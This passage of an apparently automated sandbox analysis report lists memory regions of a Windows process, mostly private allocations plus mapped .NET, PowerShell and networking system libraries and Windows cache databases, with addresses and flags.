private name = "private_0x000002386d7c0000" filename = "" Region: id = 789 start_va = 0x7ff7f5810000 end_va = 0x7ff7f581ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5810000" filename = "" Region: id = 790 start_va = 0x7ff7f5820000 end_va = 0x7ff7f582ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5820000" filename = "" Region: id = 791 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 792 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 793 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 794 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 795 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 796 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 797 start_va = 0x2386d8f0000 end_va = 0x2386d8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d8f0000" filename = "" Region: id = 798 start_va = 0x2386d900000 end_va = 0x2386d90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d900000" filename = "" Region: id = 799 start_va = 0x2386d910000 end_va = 0x2386d91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d910000" filename = "" Region: id = 800 start_va = 0x7ff84ea70000 end_va = 0x7ff84f386fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\180c5b058514424a5097dc9f075fe609\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\180c5b058514424a5097dc9f075fe609\\system.data.ni.dll") Region: id = 801 start_va = 0x7ff84e710000 end_va = 0x7ff84ea63fff monitored = 1 entry_point = 0x7ff84e8557fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 802 start_va = 0x7ff86f7c0000 end_va = 0x7ff86f82afff monitored = 0 entry_point = 0x7ff86f7d90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 803 start_va = 0x2386d8f0000 end_va = 0x2386dc3bfff monitored = 1 entry_point = 0x2386da357fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 804 start_va = 0x7ff7f5830000 end_va = 0x7ff7f583ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5830000" filename = "" Region: id = 805 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 806 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 807 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 808 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 809 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 810 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 811 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 812 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 813 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 814 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 815 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 816 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 817 start_va = 0xafa51d0000 end_va = 0xafa520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa51d0000" filename = "" Region: id = 818 start_va = 0xafa5210000 end_va = 0xafa528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5210000" filename = "" Region: id = 819 start_va = 0x2386d790000 end_va = 0x2386d790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 820 start_va = 0x2386d790000 end_va = 0x2386d7b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 821 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 822 start_va = 0x7ff84da10000 end_va = 0x7ff84e705fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\microsoft.powershell.commands.utility.ni.dll") Region: id = 823 start_va = 0x2386d790000 end_va = 0x2386d795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 824 start_va = 0x2386d790000 end_va = 0x2386d7b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 825 start_va = 0x7ff7f5840000 end_va = 0x7ff7f584ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5840000" filename = "" Region: id = 826 start_va = 0x7ff7f5850000 end_va = 0x7ff7f585ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5850000" filename = "" Region: id = 827 start_va = 0x7ff7f5860000 end_va = 0x7ff7f586ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5860000" filename = "" Region: id = 828 start_va = 0xafa5290000 end_va = 0xafa52cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5290000" filename = "" Region: id = 829 start_va = 0x2386d790000 end_va = 0x2386d795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 830 start_va = 0x2386d790000 end_va = 0x2386d7b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 831 start_va = 0x7ff7f5870000 end_va = 0x7ff7f587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5870000" filename = "" Region: id = 832 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 833 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 834 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 835 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 836 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 837 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 838 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 839 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 840 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 841 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 842 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 843 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 844 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 845 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 846 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 847 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 848 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 849 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 850 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 851 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 852 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 853 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 854 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 855 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 856 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 857 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 858 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 859 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 860 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 861 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 862 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 863 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 864 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 865 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 866 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 867 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 868 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 869 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 870 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 871 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 872 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 873 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 874 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 875 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 876 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 877 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 878 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 879 start_va = 0x7ff8672e0000 end_va = 0x7ff867317fff monitored = 0 entry_point = 0x7ff8672f8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 880 start_va = 0x7ff86ce40000 end_va = 0x7ff86cee9fff monitored = 0 entry_point = 0x7ff86ce67910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 881 start_va = 0x7ff871200000 end_va = 0x7ff871207fff monitored = 0 entry_point = 0x7ff871201ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 882 start_va = 0x7ff866eb0000 end_va = 0x7ff866ec5fff monitored = 0 entry_point = 0x7ff866eb19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 883 start_va = 0x7ff866e90000 end_va = 0x7ff866ea9fff monitored = 0 entry_point = 0x7ff866e92430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 884 start_va = 0x7ff866e30000 end_va = 0x7ff866e3afff monitored = 0 entry_point = 0x7ff866e31d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 885 start_va = 0x7ff84d950000 end_va = 0x7ff84da09fff monitored = 0 entry_point = 0x7ff84d955d90 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 886 start_va = 0x7ff865950000 end_va = 0x7ff865977fff monitored = 0 entry_point = 0x7ff86595c7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 887 start_va = 0x7ff867c40000 end_va = 0x7ff867c53fff monitored = 0 entry_point = 0x7ff867c42d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 888 start_va = 0x7ff86dcf0000 end_va = 0x7ff86dd4bfff monitored = 0 entry_point = 0x7ff86dd06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 889 start_va = 0x2386d8f0000 end_va = 0x2386d9cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 890 start_va = 0xafa52d0000 end_va = 0xafa534ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa52d0000" filename = "" Region: id = 891 start_va = 0x7ff867550000 end_va = 0x7ff867617fff monitored = 0 entry_point = 0x7ff8675913f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 892 start_va = 0x7ff865e30000 end_va = 0x7ff865e44fff monitored = 0 entry_point = 0x7ff865e32dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 893 start_va = 0x2386d790000 end_va = 0x2386d796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 894 start_va = 0xafa5350000 end_va = 0xafa53cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5350000" filename = "" Region: id = 895 start_va = 0xafa53d0000 end_va = 0xafa540ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa53d0000" filename = "" Region: id = 896 start_va = 0xafa5410000 end_va = 0xafa548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5410000" filename = "" Region: id = 897 start_va = 0xafa5490000 end_va = 0xafa54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5490000" filename = "" Region: id = 898 start_va = 0xafa54d0000 end_va = 0xafa554ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa54d0000" filename = "" Region: id = 899 start_va = 0xafa5550000 end_va = 0xafa55cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5550000" filename = "" Region: id = 900 start_va = 0x7ff84d810000 end_va = 0x7ff84d947fff monitored = 1 entry_point = 0x7ff84d837fb0 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\diasymreader.dll") Region: id = 901 start_va = 0xafa55d0000 end_va = 0xafa560ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa55d0000" filename = "" Region: id = 902 start_va = 0xafa5610000 end_va = 0xafa564ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5610000" filename = "" Region: id = 903 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 904 start_va = 0x7ff84d270000 end_va = 0x7ff84d42ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\76b4de5afa2a20eef86641e48b8a2a9c\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pae3498d9#\\76b4de5afa2a20eef86641e48b8a2a9c\\microsoft.powershell.commands.management.ni.dll") Region: id = 905 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 906 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 907 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 908 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 909 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 910 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 911 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 912 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 913 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 914 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 915 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 916 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 917 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 918 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 919 start_va = 0x2386d9d0000 end_va = 0x2386d9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d9d0000" filename = "" Region: id = 920 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 921 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 922 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 923 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 924 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 925 start_va = 0x7ff86c9a0000 end_va = 0x7ff86cb25fff monitored = 0 entry_point = 0x7ff86c9ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 926 start_va = 0x2386cf00000 end_va = 0x2386cf03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 927 start_va = 0x2386d9d0000 end_va = 0x2386da14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 928 start_va = 0x2386d7a0000 end_va = 0x2386d7a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 929 start_va = 0x2386da20000 end_va = 0x2386daadfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 930 start_va = 0x2386d7b0000 end_va = 0x2386d7c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 931 start_va = 0x2386d7d0000 end_va = 0x2386d7d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 932 start_va = 0x2386dab0000 end_va = 0x2386dacafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" 